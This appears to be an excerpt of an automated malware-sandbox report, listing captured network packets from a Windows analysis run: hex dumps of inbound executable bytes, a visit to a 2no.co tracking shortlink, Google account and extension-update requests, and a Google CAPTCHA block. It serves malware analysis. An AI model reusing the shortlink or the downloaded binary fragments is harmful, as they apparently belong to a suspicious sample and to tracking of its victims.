Feb 21, 2024 08:14:08.072550058 CET	1286	IN	Data Raw: 00 74 71 8b 15 50 d4 42 00 89 55 f0 8b 45 f0 83 e8 01 89 45 f0 83 7d f0 69 77 3d 8b 4d f0 0f b6 91 ec 2e 40 00 ff 24 95 d8 2e 40 00 6a 11 6a 00 e8 0f 85 00 00 83 c4 08 eb 30 6a 12 6a 00 e8 01 85 00 00 83 c4 08 eb 22 6a 13 6a 00 e8 f3 84 00 00 83 Data Ascii: tqPBUEE}iw=M.@$.@jj0jj"jjPBPjj@E=@B=LBtMQLBR,Bt}t^E%=tMQj!j\|6Uu=BtE%P B
Feb 21, 2024 08:14:08.072559118 CET	1286	IN	Data Raw: ec 51 89 4d fc 33 c0 8b 4d fc 66 89 01 33 d2 8b 45 fc 66 89 50 02 8b 4d fc c7 41 08 00 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 71 6d 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 Data Ascii: QM3Mf3EfPMAE]UQMMqm]UQMEQM-]UQMEE]UQME@@MQURMd6]UQMEPM6]UE
Feb 21, 2024 08:14:08.072590113 CET	1286	IN	Data Raw: c0 01 50 8d 4d ec e8 dd fd ff ff 50 8b 4d f8 83 c1 01 51 ff 15 44 90 42 00 8d 4d ec e8 97 fd ff ff 8d 4d ec e8 1f a1 00 00 89 45 fc c7 45 e8 00 00 00 00 eb 09 8b 55 e8 83 c2 01 89 55 e8 81 7d e8 ff 0f 00 00 7d 4d 8b 45 fc 83 c0 0f 50 8d 4d ec e8 Data Ascii: PMPMQDBMMEEUU}}MEPMEMQUREMARBM<MP@BuEPMM`E]UQEPXBEMQXB;E\|$UREPMQPBuU
Feb 21, 2024 08:14:08.287698030 CET	1286	IN	Data Raw: 00 00 75 0e 8b 4d 08 51 e8 55 ff ff ff 83 c4 04 eb 38 83 3d 88 d4 42 00 02 75 2a 8b 55 0c 52 8d 85 bc fd ff ff 50 ff 15 50 90 42 00 85 c0 7c 07 b8 01 00 00 00 eb 13 8b 4d 08 51 e8 22 ff ff ff 83 c4 04 eb 05 b8 01 00 00 00 8b e5 5d c3 cc cc cc cc Data Ascii: uMQU8=Bu*URPPB\|MQ"]UjEP\BuIHBE}tMQ B3.UR@BE}tEuMQ B3]UM2jjMPMP`BE}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.21.79.229	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:05 UTC	655	OUT	GET /2ZrVm4 HTTP/1.1 Host: 2no.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-21 07:14:06 UTC	1184	IN	HTTP/1.1 302 Found Date: Wed, 21 Feb 2024 07:14:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: http://www.google.com/ set-cookie: 528326243210798046=2; expires=Fri, 21 Feb 2025 07:14:06 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=191.96.227.222; expires=Fri, 21 Feb 2025 07:14:06 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict memory: 0.4249114990234375 expires: Wed, 21 Feb 2024 07:14:06 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yLeIVJnsiH94cj8nvKEDm3wCAHXfEvAWuMVqfY2vbtd99QCd3Dcia4BXBNsFAJ4qrUKzyML1naqWsm%2BmnUG%2BaufzRc4IxGvQ3Mr8ZG8Aw2M9EAmU6YkhJ2o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858d30c34e5b7cff-EWR alt-svc: h3=":443"; ma=86400
2024-02-21 07:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	142.251.163.84	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:05 UTC	680	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
2024-02-21 07:14:05 UTC	1	OUT	Data Raw: 20 Data Ascii:
2024-02-21 07:14:06 UTC	1798	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 21 Feb 2024 07:14:06 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: script-src 'report-sample' 'nonce--WDdll2M8JIHNKsSv3FMOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIW6OfUevrWMTmPHwjiYAn-gXZw" Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:06 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-02-21 07:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	142.251.40.174	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:05 UTC	752	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-117.0.5938.132 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-21 07:14:06 UTC	732	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-wLoHULx8mYfFYN3RwuaqAA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 21 Feb 2024 07:14:06 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6259 X-Daystart: 83646 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-02-21 07:14:06 UTC	520	IN	Data Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 35 39 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 38 33 36 34 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6259" elapsed_seconds="83646"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2024-02-21 07:14:06 UTC	200	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2024-02-21 07:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	23.51.58.94	443

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:06 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-02-21 07:14:06 UTC	495	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/073D) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=130296 Date: Wed, 21 Feb 2024 07:14:06 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	23.51.58.94	443

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:06 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-02-21 07:14:06 UTC	456	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0778) X-CID: 11 Cache-Control: public, max-age=130265 Date: Wed, 21 Feb 2024 07:14:06 GMT Content-Length: 55 Connection: close X-CID: 2
2024-02-21 07:14:06 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:06 UTC	846	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
2024-02-21 07:14:07 UTC	1845	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIv8XWrgYQxKuRcBIEv2Dj3g Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-vyTCCSOVhsiFrVdJ8FkPLg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Date: Wed, 21 Feb 2024 07:14:07 GMT Server: gws Content-Length: 398 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-02-21-07; expires=Fri, 22-Mar-2024 07:14:07 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w; expires=Mon, 19-Aug-2024 07:14:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:14:07 UTC	398	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 61 6d 70 3b 71 3d 45 67 53 5f 59 4f 50 65 47 4c 37 46 31 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49715	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:07 UTC	1106	OUT	GET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
2024-02-21 07:14:07 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Feb 2024 07:14:07 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3056 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-21 07:14:07 UTC	896	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/</title></head><body style="font
2024-02-21 07:14:07 UTC	1252	IN	Data Raw: 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 78 7a 33 4c 73 44 68 6e 56 4b 57 4e 44 50 41 78 59 73 66 53 61 69 2d 36 35 67 51 66 55 57 42 35 35 4c 38 54 46 75 62 68 63 51 71 4a 6c 72 6c 74 62 Data Ascii: esponse) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltb
2024-02-21 07:14:07 UTC	908	IN	Data Raw: 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e 67 20 74 68 65 20 61 62 6f 76 65 20 43 41 50 54 43 48 41 20 77 69 6c 6c 20 6c 65 74 20 79 6f 75 Data Ascii: sts coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49717	142.250.65.228	443	7220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-21 07:14:07 UTC	1123	OUT	GET /recaptcha/api.js HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
